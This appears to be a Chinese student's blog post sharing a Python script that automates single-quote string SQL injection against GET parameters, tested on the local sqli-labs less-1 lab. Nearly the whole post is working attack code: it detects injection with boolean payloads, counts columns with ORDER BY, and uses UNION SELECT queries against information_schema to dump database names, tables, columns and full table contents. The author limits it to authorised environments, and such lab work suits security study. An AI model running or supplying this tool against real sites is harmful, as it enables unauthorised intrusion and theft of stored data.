写了一个用 Python 3 实现的 SQL 注入自动化脚本(目前只处理 GET 参数的单引号字符串型注入,以本地 sqli-labs 的 less-1 为测试目标;只能在自己搭建或已获授权的环境上运行)
临近毕业,尝试写一些自动注入和自动扫描的脚本
发现还是不够自动:回显列的判断只是简单的长度/字符计数启发式,要注入的库和表也还要手动输入
后面我再改改。现在脖子疼
实现效果
代码如下:
import requests
from bs4 import BeautifulSoup
from colorama import init, Fore, Back, Style
import sys
import time
import urllib.parse
import re
from prettytable import PrettyTable
init(autoreset=True)  # colorama: reset colour after each print (the Colored helpers below also append Fore.RESET explicitly)
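class Colored(object):
    """Wrap text in colorama foreground (and optionally background) codes.

    Every helper appends the matching RESET code so a coloured fragment can be
    concatenated with the next one without bleeding its colour into it.
    """

    def _fg(self, code: str, s: str) -> str:
        # Single place that builds "<colour>text<reset>" for the foreground-only helpers.
        return code + s + Fore.RESET

    # foreground: red, background: default
    def red(self, s: str) -> str:
        return self._fg(Fore.RED, s)

    # foreground: green, background: default
    def green(self, s: str) -> str:
        return self._fg(Fore.GREEN, s)

    # foreground: yellow, background: default
    def yellow(self, s: str) -> str:
        return self._fg(Fore.YELLOW, s)

    # foreground: blue, background: default
    def blue(self, s: str) -> str:
        return self._fg(Fore.BLUE, s)

    # foreground: magenta, background: default
    def magenta(self, s: str) -> str:
        return self._fg(Fore.MAGENTA, s)

    # foreground: cyan, background: default
    def cyan(self, s: str) -> str:
        return self._fg(Fore.CYAN, s)

    # foreground: white, background: default
    def white(self, s: str) -> str:
        return self._fg(Fore.WHITE, s)

    # foreground: black, background: default
    def black(self, s: str) -> str:
        # Previously returned only Fore.BLACK and dropped both the text and the reset.
        return self._fg(Fore.BLACK, s)

    # foreground: white, background: green
    def white_green(self, s: str) -> str:
        # Both the foreground and the background are reset afterwards.
        return Fore.WHITE + Back.GREEN + s + Fore.RESET + Back.RESET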
color = Colored()  # shared colour formatter used by every log line in this script
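REQUEST_TIMEOUT = 10  # seconds; without it a hanging target blocks the whole run

# Probe row used to find which column of the injected UNION the page echoes.
# TODO(review): this is fixed at three columns even though the ORDER BY step
# below measures the real column count; targets with a different width will
# get a SQL error instead of an echo.
PROBE_COLUMNS = "1,2,3"


def log_line(tag: str, tag_color, message: str) -> None:
    """Print one `[HH:MM:SS][tag]message` line in the script's colour scheme."""
    print(
        color.white("[")
        + color.blue(time.strftime("%H:%M:%S"))
        + color.white("]")
        + color.white("[")
        + tag_color(tag)
        + color.white("]")
        + message
    )


def log_payload(payload: str) -> None:
    """Announce a request that is about to be sent."""
    log_line("payload", color.magenta, color.white("正在执行") + color.green(payload))


def log_info(message: str) -> None:
    """Print an informational line."""
    log_line("INFO", color.green, message)


def ask(prompt: str) -> str:
    """Prompt the operator for a value in the same `[time][输入]` style as the log lines."""
    return input(
        color.white("[")
        + color.blue(time.strftime("%H:%M:%S"))
        + color.white("]")
        + color.white("[")
        + color.magenta("输入")
        + color.white("]")
        + color.yellow(prompt)
    )


def fetch(session, url: str):
    """GET *url* through the shared session with a bounded timeout."""
    return session.get(url, timeout=REQUEST_TIMEOUT)


def clean_echo_fragment(fragment: str) -> str:
    """Return *fragment* cut at the first '<' or '"', whichever comes first.

    The page slice that holds a UNION result is bounded on the right by the
    HTML that followed the probe value, so anything from the first tag or
    quote onwards is markup, not data.  (The original code called
    ``str.find(...)[0]``, which raises TypeError because ``find`` returns an
    int, and its second ``if/else`` discarded the result of the first cut.)
    """
    cut = len(fragment)
    for marker in ('<', '"'):
        idx = fragment.find(marker)
        if 0 <= idx < cut:
            cut = idx
    return fragment[:cut]


def union_columns(expr: str, position: int) -> str:
    """Build the three-column UNION select list with *expr* in column *position* (1-based)."""
    cols = PROBE_COLUMNS.split(",")
    cols[position - 1] = expr
    return ",".join(cols)


def slice_between(content, place_left: int, right_text: str) -> str:
    """Return str(content)[place_left:first occurrence of right_text].

    ``str()`` of the response bytes gives the ``b'...'`` repr; that is kept
    because every offset in this script is measured on the same
    representation.  When *right_text* is absent the slice runs to the end
    instead of silently stopping one character early (``find`` == -1).
    """
    text = str(content)
    end = text.find(right_text)
    if end < 0:
        end = len(text)
    return text[place_left:end]


def dump_with_union(session, base: str, position: int, place_left: int, right_text: str) -> None:
    """Walk version -> schemas -> tables -> columns -> rows through the echoed column.

    Args:
        session: shared requests session.
        base: URL up to and including ``%27/**/union/**/select/**/``.
        position: the echoed UNION column (1 or 2).
        place_left: offset of the echoed value in str(response.content), measured
            on the ``1,2,3`` probe response.
        right_text: the 16 characters that followed the echoed value on the probe
            page; used as the right-hand boundary on every later page.

    The database and table names typed by the operator are interpolated into
    the payload verbatim (this is an attack tool; the operator controls both).
    """

    def grab(select_list: str) -> str:
        # One UNION request; returns the echoed cell with trailing markup removed.
        payload = base + select_list + "--+"
        log_payload(payload)
        resp = fetch(session, payload)
        return clean_echo_fragment(slice_between(resp.content, place_left, right_text))

    schemas = grab(
        union_columns("group_concat(schema_name)", position)
        + "/**/from/**/information_schema.schemata"
    )
    version = grab(union_columns("version()", position))

    log_line("Version", color.magenta, color.white("数据库版本 ") + color.green(version))
    version_table = PrettyTable(["Version"])
    version_table.add_row([version])
    print(version_table)

    log_line("database", color.magenta, color.yellow("数据库有\n"))
    dbs_table = PrettyTable(["Database"])
    for name in schemas.split(","):
        dbs_table.add_row([name])
    print(dbs_table)

    inj_database = ask("请输入你要注入的数据库:")
    tables = grab(
        union_columns("group_concat(table_name)", position)
        + '/**/from/**/information_schema.tables/**/where/**/table_schema="' + inj_database + '"'
    )
    log_line("tables", color.magenta, color.yellow("表有\n"))
    tbs_table = PrettyTable(["Tables_in_" + inj_database])
    for name in tables.split(","):
        tbs_table.add_row([name])
    print(tbs_table)

    inj_table = ask("请输入你要注入的表:")
    columns = grab(
        union_columns("group_concat(column_name)", position)
        + '/**/from/**/information_schema.columns/**/where/**/table_name="' + inj_table + '"'
    )
    log_line("columns", color.magenta, color.yellow("列有\n"))
    column_names = columns.split(",")
    rows_table = PrettyTable(column_names)

    # group_concat(c1," ",c2,...) yields "v1 v2,v1 v2": rows joined by ',' and
    # the columns of one row joined by a single space.
    rows = grab(
        union_columns("group_concat(" + columns.replace(",", '," ",') + ")", position)
        + "/**/from/**/" + inj_table
    )
    ncols = len(column_names)
    for row in rows.split(","):
        # Split at most ncols-1 times and pad, so a value containing a space
        # (or a missing trailing value) no longer makes PrettyTable raise.
        cells = row.split(" ", ncols - 1)
        cells += [""] * (ncols - len(cells))
        rows_table.add_row(cells)
    print(rows_table)


def single_quotes_injection(url: str, param_dict: dict, no_param_url: str) -> None:
    """Test one GET parameter for a single-quote string injection; on a hit, dump data via UNION SELECT.

    Args:
        url: target URL with its single parameter set to a positive value
            (``request_url`` from get_url_param).
        param_dict: ``{param_name: negated_value}``; the negated id makes the
            original row disappear so the page echoes the UNION row instead.
        no_param_url: the URL without its query string.

    Only single-parameter URLs are handled; anything else returns silently.
    Detection compares the response length of ``and 1=1`` against ``and 1=2``,
    then finds the column count with ``ORDER BY n`` (n = 1..14).  The echoed
    column is then guessed from a ``1,2,3`` probe (see the NOTE inside).
    """
    if len(param_dict) != 1:
        return
    session = requests.Session()

    payload_one = url + "%27/**/and/**/1=1--+"  # always true: page should match the original
    payload_two = url + "%27/**/and/**/1=2--+"  # always false: page changes if the quote broke out
    log_payload(payload_one)
    log_payload(payload_two)
    response_one = fetch(session, payload_one)
    response_two = fetch(session, payload_two)
    if response_one.status_code != 200:
        print(color.red("该网站可能部署了waf"))

    if len(response_one.text) == len(response_two.text):
        # Length-based boolean check found nothing; the original fell through silently.
        log_info(color.red("两次响应长度一致,未发现单引号注入"))
        return

    log_info(color.yellow("可能存在sql注入漏洞"))
    log_line("payload", color.magenta, color.green(payload_one))
    log_line("payload", color.magenta, color.green(payload_two))
    log_info(color.yellow("正在判断是否有回显"))

    # ORDER BY n: the first n whose page differs from the 1=1 baseline is one
    # past the real column count.  (The original's separate "order by 1"
    # request was never read, so it is dropped.)
    column_num = 0
    for n in range(1, 15):
        response = fetch(session, url + "%27/**/order/**/by/**/" + str(n) + "--+")
        if len(response_one.text) != len(response.text):
            column_num = n
            break
    if column_num == 0:
        log_info(color.red("未开启mysql_error()报错 可以尝试盲注"))
        return

    union_payload = (
        url
        + "%27/**/union/**/select/**/"
        + ",".join(str(n) for n in range(1, column_num))
        + "--+"
    )
    log_info(color.yellow("存在回显"))
    log_info(color.yellow("列长为") + color.cyan(str(column_num - 1)))
    log_line("payload", color.magenta, color.green(union_payload))

    for key, value in param_dict.items():
        base = no_param_url + "?" + key + "=" + value + "%27/**/union/**/select/**/"
        probe_url = base + PROBE_COLUMNS + "--+"
        log_payload(probe_url)
        probe_text = str(fetch(session, probe_url).content)

        # NOTE(review): the echoed column is inferred from how many times the
        # bare digit occurs in the whole page, and the value is then located by
        # the first '2' in *both* branches (the column-1 branch arguably should
        # anchor on '1').  This is the original heuristic, kept unchanged; it
        # only holds for pages as sparse as sqli-labs.
        place_left = probe_text.find("2")
        right_text = probe_text[place_left + 1:place_left + 17]

        if probe_text.count("1") == 1:
            position = 1
        elif probe_text.count("2") == 1:
            position = 2
        elif probe_text.count("3") == 1:
            continue  # echo in column 3 is not handled (original: pass)
        else:
            log_line("返回", color.green, color.red("不存在sql注入"))
            continue
        dump_with_union(session, base, position, place_left, right_text)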
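def get_url_param(url: str) -> list:
    """Split *url* into ``[result_url, result_param, request_url]``.

    Returns:
        result_url: *url* without its query string.
        result_param: each query parameter mapped to its value negated when it
            is an integer (``'1' -> '-1'``, ``'0' -> '-1'``, ``'-3' -> '-1'``);
            non-integer values are kept as they are.  A non-existent id makes the
            page render the injected UNION row instead of a real one.
        request_url: ``result_url?key=abs(value)`` built from the *last*
            parameter, or *url* itself when that parameter is not an integer.
            For a single-parameter URL this is just the original URL.

    Exits with status 0 after printing an error when the URL carries no query
    parameter (the original detected this only via an accidental NameError).
    """
    index = url.find("?")
    result_url = url if index < 0 else url[:index]
    url_param = dict(urllib.parse.parse_qsl(urllib.parse.urlsplit(url).query))
    if not url_param:
        print(
            color.white("[")
            + color.blue(time.strftime("%H:%M:%S"))
            + color.white("]")
            + color.white("[")
            + color.green("错误")
            + color.white("]")
            + color.red("没有参数可以注入")
        )
        sys.exit(0)

    result_param = {}
    for key, value in url_param.items():
        try:
            number = int(value)
        except ValueError:
            result_param[key] = value
            continue
        # Positive ids are negated verbatim ('-' + value); zero and negatives become '-1'.
        result_param[key] = "-" + value if number > 0 else "-1"

    request_url = url
    for key, value in result_param.items():
        try:
            request_url = result_url + "?" + key + "=" + str(abs(int(value)))
        except ValueError:
            request_url = url
    return [result_url, result_param, request_url]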
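if __name__ == "__main__":
    # The target defaults to the local sqli-labs "less-1" instance; a different
    # URL can be given as the first command-line argument.  Only point this at
    # systems you are authorised to test.
    url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost/less-1/?id=1"
    no_param_url, json_param, param_url = get_url_param(url)
    single_quotes_injection(param_url, json_param, no_param_url)
    # TODO: number_injection() for numeric parameters (e.g. less-2) is not implemented yet.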